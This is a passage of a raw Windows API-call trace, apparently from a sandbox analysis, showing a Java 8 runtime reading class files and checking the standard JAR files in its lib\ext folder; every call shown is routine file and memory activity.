nNumberOfBytesToRead=0x2be, lpNumberOfBytesRead=0x208c860, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208c860*=0x2be, lpOverlapped=0x0) returned 1 [0100.067] free (_Block=0x1221b4e0) [0100.067] free (_Block=0x121d8fe0) [0100.077] strlen (_Str="sun/net/www/protocol/file/Handler") returned 0x21 [0100.078] strlen (_Str="sun/net/www/protocol/file/Handler.class") returned 0x27 [0100.078] malloc (_Size=0x48) returned 0x121d9a80 [0100.078] malloc (_Size=0xa0) returned 0x122292e0 [0100.078] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3419e9e, lpNewFilePointer=0x208d0c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d0c0*=54632094) returned 1 [0100.078] ReadFile (in: hFile=0x134, lpBuffer=0x122292e0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d090, lpOverlapped=0x0 | out: lpBuffer=0x122292e0*, lpNumberOfBytesRead=0x208d090*=0xa0, lpOverlapped=0x0) returned 1 [0100.082] malloc (_Size=0x28) returned 0x121d80c0 [0100.082] free (_Block=0x122292e0) [0100.082] strlen (_Str="sun/net/www/protocol/file/Handler.class") returned 0x27 [0100.082] strcpy (in: _Dest=0x208d240, _Source="sun/net/www/protocol/file/Handler.class" | out: _Dest="sun/net/www/protocol/file/Handler.class") returned="sun/net/www/protocol/file/Handler.class" [0100.082] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x313c8ac, lpNewFilePointer=0x208ccc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ccc0*=51628204) returned 1 [0100.083] ReadFile (in: hFile=0x134, lpBuffer=0x208cd10, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cc90, lpOverlapped=0x0 | out: lpBuffer=0x208cd10*, lpNumberOfBytesRead=0x208cc90*=0x1e, lpOverlapped=0x0) returned 1 [0100.099] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x313c8f1, lpNewFilePointer=0x208cd20, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd20*=51628273) returned 1 [0100.099] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x950, lpNumberOfBytesRead=0x208ccf0, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208ccf0*=0x950, lpOverlapped=0x0) returned 1 [0100.100] free (_Block=0x1221b2a0) [0100.100] free (_Block=0x121d9080) [0100.103] strlen (_Str="java/net/URLStreamHandler.class") returned 0x1f [0100.103] malloc (_Size=0x48) returned 0x121d9cb0 [0100.103] malloc (_Size=0xa0) returned 0x122292e0 [0100.104] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3419e51, lpNewFilePointer=0x208c680, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c680*=54632017) returned 1 [0100.104] ReadFile (in: hFile=0x134, lpBuffer=0x122292e0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c650, lpOverlapped=0x0 | out: lpBuffer=0x122292e0*, lpNumberOfBytesRead=0x208c650*=0xa0, lpOverlapped=0x0) returned 1 [0100.105] malloc (_Size=0x20) returned 0x121d7a30 [0100.105] free (_Block=0x122292e0) [0100.107] strlen (_Str="java/net/URLStreamHandler.class") returned 0x1f [0100.107] strcpy (in: _Dest=0x208c800, _Source="java/net/URLStreamHandler.class" | out: _Dest="java/net/URLStreamHandler.class") returned="java/net/URLStreamHandler.class" [0100.107] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x313b295, lpNewFilePointer=0x208c280, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c280*=51622549) returned 1 [0100.107] ReadFile (in: hFile=0x134, lpBuffer=0x208c2d0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c250, lpOverlapped=0x0 | out: lpBuffer=0x208c2d0*, lpNumberOfBytesRead=0x208c250*=0x1e, lpOverlapped=0x0) returned 1 [0100.134] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x313b2d2, lpNewFilePointer=0x208c2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c2e0*=51622610) returned 1 [0100.134] ReadFile (in: hFile=0x134, lpBuffer=0x2103510, nNumberOfBytesToRead=0x15da, lpNumberOfBytesRead=0x208c2b0, lpOverlapped=0x0 | out: lpBuffer=0x2103510*, lpNumberOfBytesRead=0x208c2b0*=0x15da, lpOverlapped=0x0) returned 1 [0100.135] free (_Block=0x121d80c0) [0100.135] free (_Block=0x121d9a80) [0100.147] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext") returned 0x2a [0100.147] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\cldrdata.jar") returned 0x37 [0100.147] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\cldrdata.jar", lpFindFileData=0x208d170 | out: lpFindFileData=0x208d170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb39aae1, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb39aae1, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb3a33d2, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x3ae816, dwReserved0=0x4, dwReserved1=0x6f5fceac, cFileName="cldrdata.jar", cAlternateFileName="")) returned 0x425b40 [0100.148] FindClose (in: hFindFile=0x425b40 | out: hFindFile=0x425b40) returned 1 [0100.148] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext") returned 0x2a [0100.148] wcslen (_String="cldrdata.jar") returned 0xc [0100.148] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\cldrdata.jar") returned 0x37 [0100.149] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\cldrdata.jar") returned 0x37 [0100.149] malloc (_Size=0x7a) returned 0x122292e0 [0100.149] wcscpy (in: _Dest=0x122292e0, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\cldrdata.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\cldrdata.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\cldrdata.jar" [0100.149] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\cldrdata.jar", nBufferLength=0x9, lpBuffer=0x208dd08, lpFilePart=0x208dd00 | out: lpBuffer="", lpFilePart=0x208dd00*=0x0) returned 0x38 [0100.149] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\cldrdata.jar" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\ext\\cldrdata.jar"), fInfoLevelId=0x0, lpFileInformation=0x208daa0 | out: lpFileInformation=0x208daa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb39aae1, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb39aae1, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb3a33d2, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x3ae816)) returned 1 [0100.150] free (_Block=0x122292e0) [0100.151] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext") returned 0x2a [0100.151] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\dnsns.jar") returned 0x34 [0100.151] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\dnsns.jar", lpFindFileData=0x208d170 | out: lpFindFileData=0x208d170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb3a4834, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb3a4834, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb3a4834, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x205e, dwReserved0=0x4, dwReserved1=0x6f5fceac, cFileName="dnsns.jar", cAlternateFileName="")) returned 0x425cc0 [0100.151] FindClose (in: hFindFile=0x425cc0 | out: hFindFile=0x425cc0) returned 1 [0100.151] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext") returned 0x2a [0100.151] wcslen (_String="dnsns.jar") returned 0x9 [0100.152] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\dnsns.jar") returned 0x34 [0100.152] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\dnsns.jar") returned 0x34 [0100.152] malloc (_Size=0x74) returned 0x1221c430 [0100.152] wcscpy (in: _Dest=0x1221c430, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\dnsns.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\dnsns.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\dnsns.jar" [0100.153] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\dnsns.jar", nBufferLength=0x9, lpBuffer=0x208dd08, lpFilePart=0x208dd00 | out: lpBuffer="", lpFilePart=0x208dd00*=0x0) returned 0x35 [0100.153] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\dnsns.jar" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\ext\\dnsns.jar"), fInfoLevelId=0x0, lpFileInformation=0x208daa0 | out: lpFileInformation=0x208daa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb3a4834, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb3a4834, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb3a4834, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x205e)) returned 1 [0100.153] free (_Block=0x1221c430) [0100.154] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext") returned 0x2a [0100.154] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\jaccess.jar") returned 0x36 [0100.154] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\jaccess.jar", lpFindFileData=0x208d170 | out: lpFindFileData=0x208d170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb3a4834, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb3a4834, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb3a4834, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0xade4, dwReserved0=0x4, dwReserved1=0x6f5fceac, cFileName="jaccess.jar", cAlternateFileName="")) returned 0x425fc0 [0100.155] FindClose (in: hFindFile=0x425fc0 | out: hFindFile=0x425fc0) returned 1 [0100.155] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext") returned 0x2a [0100.155] wcslen (_String="jaccess.jar") returned 0xb [0100.155] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\jaccess.jar") returned 0x36 [0100.156] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\jaccess.jar") returned 0x36 [0100.156] malloc (_Size=0x78) returned 0x1221bf30 [0100.156] wcscpy (in: _Dest=0x1221bf30, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\jaccess.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\jaccess.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\jaccess.jar" [0100.156] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\jaccess.jar", nBufferLength=0x9, lpBuffer=0x208dd08, lpFilePart=0x208dd00 | out: lpBuffer="", lpFilePart=0x208dd00*=0x0) returned 0x37 [0100.156] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\jaccess.jar" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\ext\\jaccess.jar"), fInfoLevelId=0x0, lpFileInformation=0x208daa0 | out: lpFileInformation=0x208daa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb3a4834, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb3a4834, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb3a4834, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0xade4)) returned 1 [0100.157] free (_Block=0x1221bf30) [0100.158] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext") returned 0x2a [0100.158] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\jfxrt.jar") returned 0x34 [0100.158] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\jfxrt.jar", lpFindFileData=0x208d170 | out: lpFindFileData=0x208d170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb3b45b0, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb3b45b0, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb3e044f, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x11610cf, dwReserved0=0x4, dwReserved1=0x6f5fceac, cFileName="jfxrt.jar", cAlternateFileName="")) returned 0x4261a0 [0100.159] FindClose (in: hFindFile=0x4261a0 | out: hFindFile=0x4261a0) returned 1 [0100.159] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext") returned 0x2a [0100.159] wcslen (_String="jfxrt.jar") returned 0x9 [0100.159] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\jfxrt.jar") returned 0x34 [0100.160] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\jfxrt.jar") returned 0x34 [0100.160] malloc (_Size=0x74) returned 0x1221ceb0 [0100.160] wcscpy (in: _Dest=0x1221ceb0, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\jfxrt.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\jfxrt.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\jfxrt.jar" [0100.160] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\jfxrt.jar", nBufferLength=0x9, lpBuffer=0x208dd08, lpFilePart=0x208dd00 | out: lpBuffer="", lpFilePart=0x208dd00*=0x0) returned 0x35 [0100.160] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\jfxrt.jar" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\ext\\jfxrt.jar"), fInfoLevelId=0x0, lpFileInformation=0x208daa0 | out: lpFileInformation=0x208daa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb3b45b0, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb3b45b0, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb3e044f, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x11610cf)) returned 1 [0100.161] free (_Block=0x1221ceb0) [0100.162] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext") returned 0x2a [0100.162] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\localedata.jar") returned 0x39 [0100.162] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\localedata.jar", lpFindFileData=0x208d170 | out: lpFindFileData=0x208d170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed16d23d, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xed16d23d, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xed1ee857, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x21a293, dwReserved0=0x4, dwReserved1=0x6f5fceac, cFileName="localedata.jar", cAlternateFileName="LOCALE~1.JAR")) returned 0x425de0 [0100.162] FindClose (in: hFindFile=0x425de0 | out: hFindFile=0x425de0) returned 1 [0100.162] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext") returned 0x2a [0100.162] wcslen (_String="localedata.jar") returned 0xe [0100.163] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\localedata.jar") returned 0x39 [0100.163] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\localedata.jar") returned 0x39 [0100.163] malloc (_Size=0x7e) returned 0x122292e0 [0100.163] wcscpy (in: _Dest=0x122292e0, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\localedata.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\localedata.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\localedata.jar" [0100.163] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\localedata.jar", nBufferLength=0x9, lpBuffer=0x208dd08, lpFilePart=0x208dd00 | out: lpBuffer="", lpFilePart=0x208dd00*=0x0) returned 0x3a [0100.164] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\localedata.jar" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\ext\\localedata.jar"), fInfoLevelId=0x0, lpFileInformation=0x208daa0 | out: lpFileInformation=0x208daa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed16d23d, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xed16d23d, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xed1ee857, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x21a293)) returned 1 [0100.164] free (_Block=0x122292e0) [0100.165] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext") returned 0x2a [0100.165] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\nashorn.jar") returned 0x36 [0100.165] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\nashorn.jar", lpFindFileData=0x208d170 | out: lpFindFileData=0x208d170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb3e5249, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb3e5249, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb3ea1c7, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x1ee1cc, dwReserved0=0x4, dwReserved1=0x6f5fceac, cFileName="nashorn.jar", cAlternateFileName="")) returned 0x4261a0 [0100.165] FindClose (in: hFindFile=0x4261a0 | out: hFindFile=0x4261a0) returned 1 [0100.165] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext") returned 0x2a [0100.165] wcslen (_String="nashorn.jar") returned 0xb [0100.165] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\nashorn.jar") returned 0x36 [0100.166] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\nashorn.jar") returned 0x36 [0100.166] malloc (_Size=0x78) returned 0x1221bf30 [0100.166] wcscpy (in: _Dest=0x1221bf30, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\nashorn.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\nashorn.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\nashorn.jar" [0100.166] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\nashorn.jar", nBufferLength=0x9, lpBuffer=0x208dd08, lpFilePart=0x208dd00 | out: lpBuffer="", lpFilePart=0x208dd00*=0x0) returned 0x37 [0100.166] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\nashorn.jar" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\ext\\nashorn.jar"), fInfoLevelId=0x0, lpFileInformation=0x208daa0 | out: lpFileInformation=0x208daa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb3e5249, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb3e5249, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb3ea1c7, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x1ee1cc)) returned 1 [0100.167] free (_Block=0x1221bf30) [0100.168] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext") returned 0x2a [0100.168] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunec.jar") returned 0x34 [0100.168] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunec.jar", lpFindFileData=0x208d170 | out: lpFindFileData=0x208d170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb3ea1c7, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb3ea1c7, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb3ea1c7, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0xa2c8, dwReserved0=0x4, dwReserved1=0x6f5fceac, cFileName="sunec.jar", cAlternateFileName="")) returned 0x426860 [0100.168] FindClose (in: hFindFile=0x426860 | out: hFindFile=0x426860) returned 1 [0100.168] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext") returned 0x2a [0100.168] wcslen (_String="sunec.jar") returned 0x9 [0100.168] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunec.jar") returned 0x34 [0100.169] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunec.jar") returned 0x34 [0100.169] malloc (_Size=0x74) returned 0x1221bf30 [0100.169] wcscpy (in: _Dest=0x1221bf30, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunec.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunec.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunec.jar" [0100.170] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunec.jar", nBufferLength=0x9, lpBuffer=0x208dd08, lpFilePart=0x208dd00 | out: lpBuffer="", lpFilePart=0x208dd00*=0x0) returned 0x35 [0100.170] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunec.jar" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\ext\\sunec.jar"), fInfoLevelId=0x0, lpFileInformation=0x208daa0 | out: lpFileInformation=0x208daa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb3ea1c7, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb3ea1c7, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb3ea1c7, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0xa2c8)) returned 1 [0100.171] free (_Block=0x1221bf30) [0100.172] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext") returned 0x2a [0100.172] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunjce_provider.jar") returned 0x3e [0100.172] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunjce_provider.jar", lpFindFileData=0x208d170 | out: lpFindFileData=0x208d170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb3ec780, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb3ec780, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb3edb58, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x43d4a, dwReserved0=0x4, dwReserved1=0x12130000, cFileName="sunjce_provider.jar", cAlternateFileName="SUNJCE~1.JAR")) returned 0x425ae0 [0100.172] FindClose (in: hFindFile=0x425ae0 | out: hFindFile=0x425ae0) returned 1 [0100.172] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext") returned 0x2a [0100.172] wcslen (_String="sunjce_provider.jar") returned 0x13 [0100.172] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunjce_provider.jar") returned 0x3e [0100.173] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunjce_provider.jar") returned 0x3e [0100.173] malloc (_Size=0x88) returned 0x12229370 [0100.173] wcscpy (in: _Dest=0x12229370, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunjce_provider.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunjce_provider.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunjce_provider.jar" [0100.173] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunjce_provider.jar", nBufferLength=0x9, lpBuffer=0x208dd08, lpFilePart=0x208dd00 | out: lpBuffer="", lpFilePart=0x208dd00*=0x0) returned 0x3f [0100.173] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunjce_provider.jar" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\ext\\sunjce_provider.jar"), fInfoLevelId=0x0, lpFileInformation=0x208daa0 | out: lpFileInformation=0x208daa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb3ec780, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb3ec780, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb3edb58, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x43d4a)) returned 1 [0100.181] free (_Block=0x12229370) [0100.182] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext") returned 0x2a [0100.182] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunmscapi.jar") returned 0x38 [0100.182] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunmscapi.jar", lpFindFileData=0x208d170 | out: lpFindFileData=0x208d170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb3edb58, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xeb3edb58, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xeb3edb58, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x8177, dwReserved0=0x4, dwReserved1=0x12130000, cFileName="sunmscapi.jar", cAlternateFileName="SUNMSC~1.JAR")) returned 0x4261a0 [0100.183] FindClose (in: hFindFile=0x4261a0 | out: hFindFile=0x4261a0) returned 1 [0100.183] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext") returned 0x2a [0100.183] wcslen (_String="sunmscapi.jar") returned 0xd [0100.183] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunmscapi.jar") returned 0x38 [0100.184] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunmscapi.jar") returned 0x38 [0100.184] malloc (_Size=0x7c) returned 0x122292e0 [0100.184] wcscpy (in: _Dest=0x122292e0, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunmscapi.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunmscapi.jar") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunmscapi.jar" [0100.184] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\sunmscapi.jar", nBufferLength=0x9, 